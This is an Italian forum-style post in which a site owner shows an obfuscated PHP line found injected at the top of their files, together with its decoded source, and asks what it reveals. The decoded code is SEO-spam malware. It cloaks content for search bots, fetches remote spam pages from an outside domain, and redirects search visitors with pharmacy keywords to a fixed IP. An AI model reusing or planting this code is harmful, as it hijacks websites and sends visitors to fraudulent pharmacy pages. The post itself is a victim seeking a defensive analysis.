Ho trovato sul mio server qualcosa di simile all'inizio dei miei file php:
<?php eval(gzinflate(base64_decode('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')));?>
Dopo la decodifica ho ricevuto:
if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);
function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = @file_get_contents($url);}
return trim($out);
}
function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
return $o;
}
function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
$fe = file_exists($f);
if(!$fe || time() - filemtime($f) > 60 * $cmtime)
{
$dlc=frm_dl($link);
if($fe && $dlc===false)
@touch($f);
else
{
if($fe && empty($dlc) && $toe)
{
@touch($f);
}
else
{
if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
else{return $dlc;}
}
}
}
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):'';
}
function frm_isbot(){
$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
if(!$ua)return true;
$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
$hba=array('google','msn','yahoo');
if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
return false;
}
function frm_tmpdir(){
$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
$fs[]='.';
foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}
function frm_seref(){
$r = @strtolower($_SERVER["HTTP_REFERER"]);
$ses = array('google','bing','yahoo','ask','aol');
foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
return false;
}
function frm_havekey($s=false){
$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
return '';
}
function frm_strtonum($Str, $Check, $Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function frm_chhash($String) {
$Check1 =frm_strtonum($String, 0x1505, 0x21);
$Check2 = frm_strtonum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
$Hashnum = ($T1 | $T2);
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length - 1; $i >= 0; $i --) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function frm_chpr($url,$td){
$ch=frm_chhash($url);
$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}
function frm_red($k){
if(!frm_isbot() && frm_seref()){
$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$s=@urlencode($_SERVER['HTTP_REFERER']);
die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
}
}
$tdir = frm_tmpdir();
$isb=frm_isbot();
$k=frm_havekey();
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
$sp = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=$parg&h=$host";
//
$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if($isb && ($ppr = frm_chpr($tp)) > 1){
$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
if($pc) die($pc);
}
//
$ruri = strtolower($_SERVER['REQUEST_URI']);
$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
frm_red($k);
die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
}
if (($ruri=='/' || $ruri=='/index.php') && $isb) {
$c=frm_getcache($tdir, $sp ,60*24);
if($c)die($c);
}
//
if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
if(strpos($sdl, '|'.$ruri.'|') !== false){
frm_red($k);
die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
}
}
}
if($k) frm_red($k);
}
Puoi aiutarmi e dirmi quali informazioni utili posso ottenere da questo?